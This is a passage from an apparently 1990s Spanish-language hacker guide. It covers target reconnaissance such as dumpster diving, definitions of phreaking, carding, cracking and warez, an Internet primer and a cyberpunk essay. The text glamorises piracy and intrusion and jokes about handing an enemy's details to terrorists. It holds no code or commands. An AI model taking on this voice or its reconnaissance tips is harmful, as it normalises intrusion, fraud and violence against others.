compilarlos de una forma que pueda ser utilizada.
Cualquiera que haya hecho trabajos de inteligencia, no necesariamente para
el gobierno, pero para una compañia, va a decir que facilmente el 85% de la
informacion que uno quiere esta gratuitamente disponible y que la parte
dificil es reconocerla y analizarla. El problema generalmente es que se
consiguen los programas pirateados que vienen sin manual; o si se los compran,
los manuales se ven demasiado gordos como para leerlos... ahi esta el error
que casi todos cometen. NUNCA subestimes a los manuales.
Del 15% restante, casi la mitad puede ser deducida del material que uno ya
tiene, porque dado un objetivo deseado, usualmente hay solo un limitado numero
de soluciones sensibles.
Podemos llegar mas alla: a veces podes probar tus DEDUCCIONES y despues
desarrollar futuras hipotesis. Entonces el hacker verdadero, lejos de estar
perdiendo el tiempo frente a una PC `probando cosas' en el teclado, a menudo
puede ser encontrado recorriendo exhibiciones, yendo a demostraciones,
recogiendo literatura y, aunque no lo creas, revolviendo la basura que es un
excelente lugar para buscar la informacion que necesitas.
Recuerda que la investigacion de un hacker no depende simplemente en
coleccionar papeles para quiza usarlos en el futuro. Si decidis apuntar a un
tipo de red en particular, es casi increible lo que podes encontrar con poco
esfuerzo. A continuacion te doy unos tips para que saques tus propias
conclusiones y hagas tus hipotesis: La organizacion dueña del sistema,
"publica alguna informacion sobre el?"... "en un libro, manual, revista o
reporte?". "Cuando fueron el software y el hardware instalados?". "Alguna de
las revistas de computacion escribio algo al respecto?". Que es lo que conoces
del hardware, que tipos de sistemas operativos esperas encontrar, quien aporto
el software, conoces a alguien con experiencia en sistemas similares; etc.
El hacking va a depender de TI, de tu INTELIGENCIA, de tu PACIENCIA, de tu
DEDUCTIBILIDAD y en gran parte de tu SUERTE (bueno, en gran parte).
║ 8.0 ║ EL UNDERGROUND (INFORMATICO)
=-==-=-=-=-=-=-=-=-===-=-=-=
Hablando con diferentes personas, y viendo como se presenta al publico,
llegue a la conclusion de que la gente no sabe muy bien lo que es el Undergound
(Informatico), creen que solo es hacking o dicen cualquier cosa. Estan todos
equivocados. Informacion Underground significa en castellano basico "lo que no
se deberia saber" (ya que puede causar conmocion popular o porque el mal uso de
esa informacion puede llegar a causar problemas :) ). La traduccion de
Underground es "debajo de la tierra". Y toda la la informacion que se encuentra
en este ambiente es es cubierta por el Gobierno, el Estado mismo y el SIDE
(Servicio de Inteligencia del Estado en Argentina), la NASA, el FBI (Federal
Bureau of Investigation), la CIA, la KGB, la DEA (Drug Enforcement Agency), el
Servicio Secreto de EEUU, los medios masivos de comunicacion, la Policia, los Bancos, los
supuestos expertos en seguridad informatica, y todo aquel que esta en contra el
libre flujo de "todo tipo" de informacion.
En consecuencia, el Hacking, Phreaking, Carding, Cracking, Crashing, el
Warez, la Anarquia, el Lockpicking, el Virucking o Viriing, el como fabricar
cientos de drogas o como conseguirlas, la Magia Negra, el ocultismo, la
informacion robada que compromete a cientos de personas y agencias (como el
caso de el grupo CHAOS que robo unos datos confidenciales del desastre de
Chernobyl y los publico), informacion sobre los Ovnis o lugares secretos (Area
51?), todas las formas posibles de abusarse de la tecnologia o usarla
"indebidamente" y todo aquello que no se deberia saber, o que no se tiene que
saber, entran en el concepto de Informacion Underground por razones obvias.
Lo de "Informatico" es porque se transmite a traves de medios electronicos,
por ejemplo BBSs, Internet, etc.
8.1 "Y QUE ES TODO ESO DE PHREAKING, CARDING.... ?"
Las otras cosas que casi todos confunden es la diferencia entre las
actividades que integran el Underground.
En los comienzos del hacking, la palabra "hackear" se usaba como forma
universal de abusarse de todo tipo de cosas referidas (o no) a la tecnologia.
Entonces se podia hackear los telefonos, las tarjetas de credito, los programas
o juegos (ya sea para desprotegerlos, modificarlos o ponerles bombas logicas), etc.
Pero con el tiempo los hackers empezaron a especializarse en distintas actividades,
porque unos no sabian programar tanto, otros decian que era mas emocionante joder con los
telefonos, otros con ideas de que les gustaba destruir la informacion de los demas, otros
querian robar numeros de tarjetas de credito, etc., etc..
En consecuencia, los hackers se separaron y se especializaron en algunos de
los siguientes grupos:
*PHREAKING: la actividad de dominar casi por completo las centrales
telefonicas, para hablar gratis, cargar cuentas a otros, y divertirse
haciendole pasar un muy mal rato a estas. Esta seria la actividad de hackear
pura y exclusivamente las centrales telefonicas o el hackear mediante
dispositivos llamados "boxes". Estos incluyeron parte de la palabra "hacking"
en el nombre: la palabra "phreaking" es una mezcla de "phree" (slang de free
que significa gratis) y hacking. Hay boxes de todos los colores y las mismas tienen
distintas funciones.
*CARDING: la actividad de comprar lo que sea a traves de numeros
de tarjetas de credito robados o falsificados mediante calculos, ecuaciones y
funciones matematicas; o utlizando programas para tal fin (los cuales no da la "expiration
date" que es un GRAN problema). El carding verdadero o profesional consiste en "fabricar" las
tarjetas; es decir, crear tarjetas gemelas.
Como suponen seria hackear tarjetas de credito.
*CRACKING: actividad dedicada a la desproteccion de programas de todo tipo que
piden un numero de serie (serial number) o una clave de acceso. El cracking
obviamente se usa tambien para descifrar claves para desencriptar datos. Dicen
que el cracking es una violacion hacia nuestra privacidad, pero es discutible.
Cracking = hackear programas o datos encriptados.
En estos momentos el mejor grupo de cracking que hay es "Phrozen Crew", siguiendolo
de cerca "United Cracking Force 2000"; pero como es de suponerse hay muchos otros.
Existen personas que llaman crackers a los hackers que hacen da±o cuando entran en
los sistemas, pero en mi opinion, estos se llaman "crashers". Los hackers usan a veces
tecnicas de los crackers, por lo que es comun que se los confunda.
*CRASHING: esta actividad es una variacion del cracking. Consiste en adulterar
programas que originalmente son inofensivos agregandoles codigo dañino para
destruir los datos almacenados en la computadora de sus enemigos. Tambien
generalmente entran a los BBSs o servidores de internet con tecnicas de
hacking/cracking y destruyen la informacion que hay ahi, con fines vengativos o por diversion
(porque son ESTUPIDOS). Crashear (es una espa±olizacion de la palabra crashing) un sistema es
destruirlo.
Hay personas que me discuten que el hacking vino despues que del
phreaking (o que deriva de el), lo unico que les puedo decir es que son dos
cosas diferentes (telefonos - computadoras), lo que pasa es que se confunden
porque hay hackers que hacen phreaking para no pagar la cuenta de telefono y
phreakers que son hacker. En fin, no estoy aqui para discutir eso y podemos pasarnos
horas discutiendo del tema; pero la idea base esta, que es lo importante.
Estas fueron las variaciones (mas diectas) del hacking. Ahora paso a
describir las demas "categorias" integrantes del Underground:
*WAREZ: Warez viene de (soft)wares (la "z" es porque es vocabulario del tipo
Underground). El warez es simplemente la copia indiscriminada de programas
protegidos por (c)copyright, que supuestamente tienen que ser comprados para
su uso. En una palabra el warez es la Pirateria tal como la conocemos y
practicamos (quien no?). En la mayoria de los casos, los programas copiados
estan crackeados para evitar las claves de acceso de los mismos o para anular
cualquier otro dispositivo anti-copia.
El Warez **NO** esta considerado **NI** aceptado dentro del Underground del
Hacking y del Phreaking; esta dentro de su propio Underground. En realidad, la
mayoria de los hackers ODIAN a los K-R|\D W|\r3Z d00dz (Kool-Radical Warez
dudes), personas que para lo unico que viven es para bajarse programas
completos (Warez) y se jactan de quien tiene la ultima version de que, o quien
tiene mas 0-day-warez (programas que podian ser usados por 30 dias pero estan
crackeados para poder ser utilizados indefinidamente). A estos "seres" se los
considera enfermos mentales, ya que tienen adiccion por estos programas y solo
los quieren acumular; ni siquiera los usan o saben para que sirven. Copiar un par
de Warez NO significa ser un Wared Dood. Para mas informacion lee las Anti Warez
Asocciation Magazine.
Otra adiccion que surgio estos ultimos a±os que es del tipo del Warez y que podemos
decir que esta dentro de su mismo underground (fuera del del hacking) es la adiccion
por acumular los MP3 (formato de musica que comprime en un ratio de 12:1; algo asi como
que una cancion de 5 minutos ocupe 6 megas).
*ANARQUIA: Antes que nada... les pido por favor que no me escriban discutiendome que es
o que no es la anarquia, realmente no tengo bases historicas ni filosoficas para explicarlo,
solo explicare mas o menos de que se trata lo que se dice como "anarquia" en el Underground.
La Anarquia es una ideologia, una forma de pensar. La Anarquia
consiste en el no gobierno, el caos... hacer lo que cada uno quiera sin
importar las consecuencias; sin gobierno, sin estado, sin presidente,
gobernador o intendente, sin policias u otros organismos que representen
organizacion o paz. Los anarquistas proponen los metodos para llegar a esto,
pero no dicen que van a hacer luego que todo este destruido. Para conseguir
alcanzar sus ideales, o para imponer sus ideologias atacan a todas estas formas
de organizacion, generalmente infundiendo panico en las personas mediante
el terrorismo. Aparece la palabra "terrorismo"; la mayoria confunde
anarquista con terrorista. El anarquista es, generalmente, un terrorista que
impone su ideologia. El anarquista usa tecnicas o elementos propios usados por
los terroristas (asesinatos, bombas, etc), se hace notar y trabaja en grupos
generalmente grandes de personas. Los terroristas, en cambio, mas que imponer
su ideologia, quieren algo: lo hacen por dinero, para obtener algo, extorsion, porque
fueron contratados, y, generalmente, para liberar a sus compañeros o algun
criminal importante de la carcel, porque alguien les pago dinero para
que mataran a alguien, porque les gusta, etc.. Trabajan en grupos reducidos y
muy organizados. Te recomiendo que no los hagas enojar, y NUNCA les des nigun
dato tuyo... aunque les podes dar los datos de tu enemigo para que lo
"limpien".
En el Underground se considera Anarquia a toda informacion que enseñe o
explique como se hace una bomba, como se hace veneno, mezclas quimicas para
volar un edificio, diferentes usos de la polvora y otras mezclas, tecnicas para
robar todo tipo de cosas, como matar a alguien, como conseguir algo de alguien
por la fuerza o por la psicologia, todas las formas posibles de venganza, como
arruinarle la vida a las personas, como transformar un colegio o universidad en
un caos, tecnicas de lavado de cerebro, masacre de animales... y miles de cosas mas.
*LOCKPICKING: El lockpicking o locksmithing es la actividad de abrir
cerraduras y candados de todas las clases que existen con diferentes tecnicas y
elementos, informacion que supuestamente solo un cerrajero debe saber.
*VIRUCKING O VIRIING: la actividad de crear virus, gusanos, troyanos o bombas
logicas programando uno mismo (lo que se deberia hacer); modificando otros
(llamados "hacks"), o utilizando programas para crearlos como el VCL, VCS, G2,
NRLG, LAVI (es argentino?), etc..
*SOCIAL ENGENEERING: son tecnicas psicologicas para extraerle informacion a las
personas que no te la quieren dar o que supuestamente no deberian dartela. Asi
se obtienen facilmente los passwords, logins, numeros, etc.. Esta mas que una categoria
dentro del underground es una TECNICA que se usa en el hacking.
*MISCELANEOS: son todos los demas textos antes mencionados que no pueden caer
especificamente en una de estas categorias.
║ 9.0 ║ INTERNET FOR DUMMIES (DEMASIADO BASICO)
=-=-=-=-=-=-=-=-=-=-==-=-=-==-=-=-=-=-
ADVERTENCIA: Si conoces algo de internet te sentiras ofendido al leer esto. Es DEMASIADO
basico. Puede servir para que tu abuelita de 80 a±os entienda lo que es Internet antes de
dejar este mundo.
9.1 QUE ES INTERNET?
Expuesto de forma sencilla, Internet puede definirse como una "red de
redes de computadoras, de alcance mundial". Las redes que se encuentran
interconectadas abarcan desde grandes instalaciones gubernamentales, como las
de la NASA o la National Science Foundation de EEUU, hasta redes
universitarias, o mantenidas por organizaciones sin fines de lucro como la
Cruz Roja, y las de corporaciones como IBM, Microsoft, etc.. Maestros y
estudiantes utilizan Internet con fines educativos. Estrellas de rock,
montañistas y musicologos acceden diariamente a la red. Abogados y doctores
tambien se encuentran entre los usuarios.
A pesar de la cantidad y diversidad de personas, empresas e instituciones
que la utilizan, nadie es "dueño" de Internet: simplemente, cada usuario paga
su coneccion para llegar a ella. Que ventajas ofrece estar conectado a
Internet? Imaginemos un estudiante que desea averiguar sobre las cosechas de
arroz en distintos paises. Rastreando a traves de la red los sitios donde
puede recolectar la informacion, en pocos minutos habra obtenido datos que de
otra manera le hubieran llevado dias. Desea conocer la ultima cotizacion de
algunas "commodities"? Ningun problema, busquela en Internet. Quisiera comprar
el ultimo CD de los Rolling Stones que no fue editado en su pais? Encarguelo
por internet.
9.2 UN POCO DE HISTORIA
En 1969 nace Internet, como un proyecto de la Agencia de Proyectos de
Investigacion de Defensa Avanzados de EEUU (DARPA). EL mismo surgio de la
necesidad de intercambiar informacion entre los investigadores y cientificos
miliares, ubicados en sitios apartados. La red, que en principio se suponia
que deberia soportar hasta un ataque nuclear sin perder la conexion,
originariamente se llamo DARPANET y estaba formada por cuatro computadoras
interconectadas.
En 1972 ya se habian conectado 37 computadoras, o nodos, a la red, que
paso a llamarse ARPANET, debido a un cambio en el nombre de la agencia que la
administraba. Y como siempre ocurre esto, la aplicacion mas utilizada no fue
la prevista sino un servicio no previsto, o al menos subvalorado en un
principio: el correo electronico, o e-mail.
Hacia 1984, la Fundacion Nacional de Ciencias de EEUU establece la NSFnet.
Esta red se origina a partir de la necesidad de compartir la potencia de las
grandes supercomputadoras instaladas por la NSF, con la computadora academica.
Estos equipos eran tan caros que solo se construyeron cinco centros. En
principio se habia previsto utilizar la red ARPANET, pero ya estaba saturada.
Asi se decidio crear la NSFnet, utilizando la misma tecnologia que ARPANET,
conectando los centros en forma regional. Cada region tenia acceso a por lo
menos una supercomputadora, y el resto estaba conectado en forma mas o menos
directa, a traves de routers o "distribuidores", dentro de la autopista. La
NSFnet al poco tiempo resulto insuficiente. Para el año 1987 se redimensiono
la NSFnet, incorporando formas de acceso mas rapidas gracias al aumento en la
velocidad d4e modems y computadoras, lo que permitio extender su utilizacion
por parte de investigadores universitarios y agencias con la condicion de
pertenecer a paises aliados a EEUU. En los 90', caida del Muro mediante la
red, se abrio para todo aquel que se pudiera conectar.
9.3 TCP/IP: UN PROTOCOLO DE COMUNICACIONES
El principio unificador de Internet es un conjunto de protocolos de
comunicaciones llamado TCP/IP (Transmision Control Protocol/Internet Protocol
o Protocolo de Control de Transmision/Protocolo Internet). Un protocolo de
comunicaciones permite comunicar computadoras que utilizan sistemas operativos
diferentes entre si.
En realidad, se puede establecer una "internet" (con minusculas)
conectando dos redes de computadoras que utilicen distintos tipos de
protocolos locales, pero usando TCP/IP como protocolo de interntet working.
Virtualmente todo fabricante de sisemas cerrados provee soportes para TCP/IP.
Para pertenecer a Internet, alguna parte de esta "internet" debe estar
conectada, por ejemplo, al backbone (columna vertebral) de la NSFnet y ademas
respetar las convenciones del direccionamiento IP.
El esquema de direccionamiento de Internet se conoce como direccionamiento
IP. Una direccion IP es un numero que identifica a la red y a un host
(computadora) especifico de esa red. La direccion IP puede mapearse o
traducirse como un nombre de dominio. Por ejemplo, Microsoft de EEUU tiene por
nombre de dominioL microsoft.com, que a su vez podria subdividirse en otras
redes mas pequeñas.
Los dominios se agrupan de acuerdo al tipo de organizacion que los
sustenta. Por ejemplo, los dominios de empresas comerciales se llama .com, los
gubernamentales .gov, los educacionales .edu, etc.. Y para distinguir el pais
de origen, se utiliza otra convencion similar. Des esta forma, el codigo de
Argentina es .ar, de Canada .ca, etc..
Cada paquete tiene un header (similar a la informacion "destinatario" y
"remitente" del correo) con una direccion IP que especifica el destino. El
esquema de direccionamiento permite a las computadoras que corren el sofware
IP tomar decisiones sobre el ruteo. La tabla de ruteo no apunta directamente
al destino sino a una gateway (o compuerta) llamado next hop ("siguiente
salto"). De esta forma, los datos viajan de un "hop" al siguiente siguiendo un
camino que finalmente los conduce a su destino, en otra red. Los datos llegan
como un unico conjunto, como en un paquete, estos deben distribuirse a las
aplicaciones correspondientes. Para determinar cual es la aplicacion, TCP/IP
utiliza ports. Estos ports son parte de la informacion incluida dentro del
header de cada paquete, y determina la aplicacion destino.
9.4 FORMAS DE CONECTARSE A INTERNET
1) Por correo electronico: En el caso de la Argentina hasta hace poco su usted
no pertenecia a un organismo oficial, universitario o asociacion sin fines
de lucro, era la unica conexion disponible. Para hacer uso de ella, basta
con suscribirse a un BBS que tenga este servicio dentro de sus opciones, y
ya habra ingresado a la autopista.
2) Por Telnet: Telnet es un servicio que proveen ciertas computadoras (en
general Unix) que estan conectadas directamente a Internet, y que consiste
en utilizar la computadora del usuario como terminal remota.
3) Por linea telefonica (dial-up links): este servicio esta disponible en
Argentina solo para aquellos usuarios que tienen acceso a computadoras
conectadas en linea a Internet y consiste en utilizar el protocolo TCP/IP
via modem.
4) Por linea dedicada (leased lines): Con este tipo de conexion, el usuario
podria convertirse, incluso, de proveedor de informacion.
9.5 QUIENES COMPONEN INTERNET?
Forman parte de Internet las siguientes redes o hosts:
-FidoNet (32.000 maquinas; 2.560.000 usuarios)
-BitNet (1.481 maquinas; 111.000 usuarios)
-Core Internet (redes conectadas en linea, proveedoras de informacion:
2.500.000 maquinas; 7.800.000 usuarios)
-Consumer Internet (usuario comun de Internet en linea: 3.500.000 maquinas;
13.500.000 usuarios)
-UUCP
9.6 QUIENES ADMINISTRAN INTERNET?
Desde sus comienzos Internet fue una red carente de planificacion ni
organizacion central. Internet es el agregado de multiples voluntades y
esfuerzos, tanto individuales como de instituciones universitarias, de
investigacion, estatales y privadas. Entre ellas se puede mencionar:
- InterNIC: Organizacion destinada a la asignacion de direcciones de red IP.
Esta gerenciada por Network Solutions.
- IAB: Inter Activities Board, o Concejo de Actividades de Internet. Esta
compuesto por investigadores y se dedica a tomar decisiones y discutir temas
pertinentes a la red.
- IETF: Internet Engineering Task Force o Fuerza de Trabajo de Ingenieria de
Internet, dependiente de la IAB. Es el organismo de estandarizacion de la
red.
- Internet Society: Sociedad Internet. Presidida por Vinton Cerf, el creador
del protocolo TCP/IP, esta sociedad tiene como objetivo la difusion de
Internet y de sus tecnologias.
9.7 QUE SE NECESITA PARA ESTAR ADENTRO?
Lo minimo es tener una PC 386 o superior con Windows (puede ser version 3.1, 3.11,
95), tener un modem de 14.400 bps (V.32bis), 28.800 bps (V.34) o superior
(preferentemente de marca conocida como US Robotics o Hayes, ya que los otros
traen muchos problemas). Tambien se puede utilizar un modem menor, de 2.400 bps
(V.22bis), pero esto hace demasiada lerda la espera y nos hace gastar mas
dinero en la comunicacion.
Luego tenemos que suscribirnos a una empresa (pagando una matricula), que
nos permita la coneccion full-online en la que se paga una tarifa plana en la
que tenemos horas y acceso ilimitado. Tambien hay opciones de menor cantidad
de tiempo; el costo de esta coneccion varia de acuerdo al numero de horas
mensuales que alquilemos para estar en linea. En nuestro pais el costo de las
comunicaciones internacionales es altisimo, por lo que la suscripcion a
Internet tambien es mayor que en otros paises. Por ultimo, mientras estamos
conectados, estamos usando nuestro telefono (la linea), al costo de una llamada
local.
La empresa proveedora nos facilitara de un programa de conexion de TCP/IP
con todos sus elementos para que nos podamos "sumar" a la red.
9.8 QUE SERVICIOS BRINDA INTERNET?
- Servicios de recuperacion de informacion (FTP y Ghoper)
- Servicios de busqueda de informacion (WAIS, Archie, Veronica)
- Servicios de acceso remoto (Telnet)
- Servicios de comunicaciones (e-mail, UseNet, IRC)
- Servicios de informacion hipertexto/hipermedia (World Wide Web)
9.9 PRODUCTOS DE INTERNET
* TELNET: Nos permite conectarnos a una computadora remota e interactuar con
ella (como si fuera la nuestra); a esta se la denomina terminal boba.
* FTP: Abreviacion de File Transfer Protocol (protocolo de transferencia de
archivos), se utiliza para la transferencia de archivos a traves de la
Internet; nos permite loguearnos a una maquina remota y acceder a su disco
rigido, curiosear entre sus directorios y archivos, y copiar lo que nos
parezca util a nuestra computadora. Asi se pueden obtener las ultimas
versiones de los antivirus, etc..
* E-MAIL: (correo electronico) Nos permite comunicarnos con cualquier otro
usuario de Internet en el mundo (hay cerca de 40.000.000) a traves de
mensajes; hasta podemos enviarle archivos de nuestra computadora al
destinatario. Un e-mail (que seria una carta), puede atravezar el mundo en
cuestion de segundos... y una carta real por correo, llegara en un mes.
* GOPHER: es la manera de buscar todo tipo de informacion a traves de menues
muy faciles de usar con los que se puede acceder a casi toda la informacion
de Internet, incluyendo FTP, Usenet, Newsgroups, etc. Esta es una de las
herramientas mas poderosas de Internet.
Dentro de los items de sus menues, existen referencias a otro servidor
Gopher dentro de Internet que puede estar en otra parte del mundo; esta
habilidad permite la creacion del Gopherspace, que es la red que se forma con
las referencias cruzadas entre los distintos servidores Gopher.
* ARCHIE: es una aplicacion que permite la busqueda de archivos dentro de
Internet que se pueda bajar con FTP; este los indexa los nombres de los
archivos FTP alrededor del mundo, permitiendo una busqueda similar a la del
comando dir en DOS.
* VERONICA: es un Archie muy mejorado y para Gopher; nos permite ubicar TODA la
informacion disponible sobre un tema en particular, mediante la busqueda de
una palabra en el Gopher Space (se busca por texto descriptivo y no por
archivo).
* NEWSGROUPS (Use Net): los newsgroups son grupos de noticias y discucion o
foros de Internet nos permite intervenir en los casi 20.000 foros de
discucion que se llevan a cabo hoy en dia. Se discuten temas desde
interesantes hasta insolitos; nosotros podemos leer las opiniones de los
demas y opinar si nos parece.
Las noticias de los newsgroups se distribuyen a traves de un mecanismo que
envia los mensajes individuales (articulos) de una computadora local a todas
las computadoras que participan de UseNet (red de usuarios). Estas se conocen
como servidores de news, que usan un protocolo NNTP.
Los articulos se ingresan en un derterminado servidor de news local, y
este a su vez lo despacha al siguiente servidor de Use Net, continuando la
dadena.
* W.A.I.S.: siglas de Wide Area Information Server o Servicio de Informacion de
Area Ancha)es un metodo de consulta a bases de datos organizadas, obteniendo
informacion especializada en diversos rubros y que busca el topico requerido
en todos los archivos de los servidores de todo el mundo.
* I.R.C.: Abreviacion de Internet Relay Chat. Nos permite dialogar en tiempo
real con otros usuarios del mundo que esten en linea en ese momento. Si
tenemos multimedia en nuestra PC podemos hablar a traves de un microfono y
escuchar a traves de los parlantes (o sea hablar por telefono) con cualquier
usuario del mundo, y pagando el precio de una llamada local. Si bien no tiene
todavia la calidad y claridad del telefono estandar, funciona correctamente.
La otra opcion es tener CUSSEME (especie de abreviacion de: "can you see me?"
o de "see you, see me"), con la que comprando una mini-camara que cuesta $100
(dolares) podemos tener video y ver a la persona con la que hablamos.
* WWW: Abreviacion de World Wide Web (la gran telaraña mundial). Nos permite
observar fotografias, texto, hipertexto, y permite obtener audio y video a
traves de Internet. Casi todas las empresas de renombre poseen un acceso a
traves de Web Pages (que son las paginas que forman la WWW). Las Web Pages de
las empresas nos proveen informacion sobre ellas, los productos que ofrecen,
etc. Las universidades y colegios generalmente tambien tienen Web Pages. Las
Home Pages (que es lo mismo pero de usuarios individuales), son Web Pages de
usuarios individuales, los que pueden llegar a proveer informacion muy
interesante. Algunos de ellos nos muestran sus colecciones, sus intereses,
etc. Se pueden encontrar millones de cosas raras, insolitas e interesantes.
Tambien por la World Wide Web se pueden realizar compras en el extranjero
o hacer reservas de vuelo en lineas aereas u hoteleria, lo que NO recomiendo,
porque les piden su numero de tarjeta de credito. La estupidez mas grande que
una persona puede hacer es dar su numero de tarjeta por Internet... NO LO
HAGAN, porque ese numero recorre cientos de routers y atraviesa muchos paises,
por lo que es DEMASIADO facil que alguien lo copie y se abuse de el. Lo que
conviene es esperar a que se imponga un protocolo de encripcion estandar para
poder mandar ese tipo de informacion tan sensible y sea seguro.
Como se ve, en todos los casos la informacion que se intercambia tiene un
formato y una finalidad diferente. Esta informacion viaja a traves de
computadoras dedicadas a tal efecto llamadas routers, que hacen el papel de
agencias de correo distribuyendo la "correspondencia" (o sea la informacion)
desde y hacia donde se lo quiera.
Internet ya esta entre nosotros, y piensa quedarse. Habra que acostumbrarse
a ella como lo hicimos con la television, o antes con el telefono.
Principalmente, desde ya, nos brinda una gran ventaja: estar conectados con
el resto del mundo. La epoca en donde las novedades tardaban en llegar
quedaron atras. Con Internet el mundo se transforma en una aldea, donde esta
todo cerca. Preparate, el futuro comenzo.
║ 10.0 ║ CYBERPUNKS
=-=-=-=-=-
[El siguiente texto fue copiado de la revista HyperMedia #4. La razon es porque
el cyberpunk y su ideologia estan muy relacionados con el Hacking. Muchos
hackers se identifican como Cyberpunks.]
El futuro ha estallado en el presente.
Las megacorporaciones abren nuevos gobiernos.
Y hombres generados por computadoras abren
nuevas fronteras.
Ahora decimos: "Toda informacion debe ser libre".
No lo es.
La informacion es el poder y el dinero del mundo virtual.
Entonces, desconfia de la autoridad.
La cybercultura esta entrando en la sociedad y es la unica
union entre el cyber-mundo y los sistemas abiertos.
Bienvenidos a la cyber-corporacion.
Cyperpunk.
(Billy Idol)
"El cyberpunk habla de utilizar las armas del sistema en beneficio propio, de
darle otro uso a la tecnologia que el que los diseñadores pensaron para ella.
La ideologia es vivir en los intersicios del sistema; esos lugares grises donde
no te pueden cagar."
Daniel Bugallo, revista Neuromante
Muchas cosas se van perdiendo. Hay hombres que van dejando de ser hombres;
la tecnologia no puede aun convertir sus cuerpos en maquinas, pero si chupar
sus cerebros. Algunos proponen abandonar la pasividad ante la tecnologia: dejar
de solo mirar la television, solo usar el e-mail para enviar correo
electronico, dejar de solo usar las redes para jugar juegos multiusuario.
Cyberpunks.
Para ellos la revolucion digital es una peligrosa herramienta de dominacion.
Su pensamiento tiene raices en las ideologias revolucionarias que fueron
enterradas en un supuesto Fin de la Historia; ven en las corporaciones la
materializacion de un sistema frio, sobervio. Sin embargo, post-modernos y
nihilistas, ya no creen en un cambio radical que lo eche por tierra. Pero si
creen que la dignidad aun es posible, y que las maquinas pueden ser usadas para
subvertir, para encontrar huecos. Para, finalmente, seguir siendo seres
humanos.
Cyberpunk.
EL cyberpunk narra historias de marginales inmersos en una cultura
hiperdesarrollada tecnologicamente. Alli, los componentes tecnologicos se
expanden como un cancer dentro de los huesos de la sociedad -a traves de redes
y satelites- y dentro de los cuerpos de los hombres -a traves de implantes
cerebrales y organos manipulados geneticamente-.
Hay un sistema, encarnado en gobiernos y corporaciones, que domina las vidas
de la mayoria de la gente; su mayor herramienta de dominacion es, claro, la
tecnologia. Dentro de ese sistema, hay quienes viven del al margen: criminales,
visionarios y aquellos que simplemente quieren gozar de su propia libertad.
Marginales. Igual que aquellos punks de la decada del setenta crearon una
estetica del desamparo.
------------------------------------------------------------------------------
Una narracion cyberpunk tiene como protagonista a uno de estos marginales; y
cuenta como utilizar las herramientas tecnologicas del sistema para sus propios
fines. Habla del cyberespacio, de los hackers, y de todos los tipos que
combaten las frias normas del sistema, puntualiza Bugallo.
------------------------------------------------------------------------------
10.1 EL MOVIMIENTO LITERARIO
Al principio fue un movimiento literario. Eran los primeros latidos de la
decada del 80. Un critico llamado Gardner Dozois uso la palabra por primera vez
para designar un cuerpo literario. Dozois se declara a partir de entonces anti-
cyberpunk. El termino lo sobrevivio.
En 1984, un desconocido de nombre William Gibson publico un libro llamado
"Neuromancer". Hoy viste, en copias descuajeringadas de tanta relectura, las
bibliotecas de todo cyberpunk; es su "biblia". Lo acompañan las obras de Bruce
Sterling. Ellos son los propes del movimiento literario.
10.2 LA SUBCULTURA
El cyberpunk se fue transformando en una verdadera subcultura.
A mediados de los 80, el movimiento empezo a ser tomado como referente por
muchos jovenes norteamericanos. Ellos veian en la sociedad occidental de hoy la
semilla del opresivo sistema tecnologico temido por el cyberpunk. Muchos se
identificaban, ademas, con los personajes marginales de las historias.
Algunos de estos grupos eran los hackers, phreakers y crackers. Los hackers,
pese a que ya existian hace tiempo, cuando surgio el movimiento, fueron
influenciados fuertemente por su filosofia. Pero no todos los hackers son
cyberpunks, de acuerdo con la gente de la revista Neuromane: "Aca hay una
reunion de hackers que se hace los primeros viernes de cada mes. Y son unos
pelotudos que no te puedo explicar. Y no se si piensan lo que uno piensa. Creo que
para ellos la mano es mas ludica: meterse, conocer, mas tipo desafio-"jueguitos electronicos"
Tambien se sumaron a esta subcultura los cypherpunks, quienes ven en la
criptografia una manera de zafar del sistema, al crear regiones de privacidad
que este no pueda invadir. Y los ravers, que usan musica sampleada y
sintetizada, arte psicodelico y drogas para armar fiestas nocturnas en bodegas
abandonadas.
Todos son personas reales, que viven en este mismo mundo y esta misma epoca,
y creen que el futuro apocaliptico que narraba el cyberpunk esta ahi nomas, a
la vuelta de la esquina. "La tecnologia va a rodear la tierra, y todo va a
estar interconectado. Vas a comprar algo con la tarjeta de credito y las
agencias de seguridad de todo el mundo van a saber en que gastas la guita. -
anticipa Bugallo-. Esta va a ser la herramienta mas global que va a tener el
sistema para manejar el mundo".
10.3 LA MODA DE HOY
Sin embargo, el cyberpunk no tardo en transformarse en una moda, y perder a
los ojos de la gente sus connotaciones subversivas. Dice Erich Schneider, de la
FAQ de alt.cyberpunk: "para algunos `cyberpunk' es otro adolescente de todos
los dias con algun talento tecnico o simplemente alguien que busca la ultima
moda para identificarse con ella. Esto llevo a que mucha gente viera a los que
se autoproclaman cyberpunks con malos ojos". Bugallo acuerda: "El cyberpunk
empieza como un movimiento literario anarquista y se transforma en una moda. El
sistema lo toma y, a partir de entonces, ser cyberpunk es andar con aritos como
chips o hacer un disco como el que hizo Billy Idol. Lo mismo le paso al punk:
fue un movimiento de los suburbios, compuesto por unos tipos que se habian
quedado en la calle con los parates economicos de la decada del 70. Eran los
tiempos en que vivian con el cheque del seguro social; es decir, con nada. Y
armaron una estetica alrededor de eso: reciclaron ropa y usaron basura como
adornos. Y tenian un mensaje contestatario contra ese sistema que los
marginaba. Despues los agarraron las discograficas y los subvirtieron. Eso les
pasa a todos. Hasta al cyberpunk. Justamente por eso creo que la etica es no
encasillarse en nada. Hoy sera el cyberpunk, pero mañana no se".
En una entrevista con Daniel Bugallo y Horacio Moreno (de la revista argentina
Neuromante), se les pregunto: "Cual es la etica del cyberpunk?". Respondieron:
Bugallo -Las renovaciones del estallido, de manifestacion social, se acabaron.
La unica rebelion posible en la epoca en la que vivimos nosotros, tan
interconectados, es lograr preservar tu libertad, utilizando lo que el sistema
te da para preservarla. Lo que se plantea es vivir en los intersicios del
sistema; darle nuestro propio uso a la tecnologia, para poder hablar con mayor
libertad.
Moreno -En definitiva, sobrevivir. Porque esa es la ley de la selva. Y para
sobrevivir hay que ser astuto.
║ 11.0 ║ TANX 2
=-=-=-
@ Omykron que sin su ayuda yo seria un ignorante mas.
@ Hugo Cornwall quien me inspiro para escribir lo que hoy pudo ser este file.
@ Mighty Maus (STOP SMOKING POT!!!).
@ Fernando Bonstan... Bonsembiante, a quien varios le debemos las
gracias por mas que se lo considere un lamer. Menos mal que la informacion
debe ser LIBRE, GRATUITA y PARA TODOS, nooooooooo???... Larga la info man :)
@ John Perry Barlow por su inspiracion e ideologias Cyberpunk.
@ Don (Juan) Caballero por haber escaneado el "Hackers, la guerrilla
informatica" porque no pensaba escribir todo lo que cut-pastee.
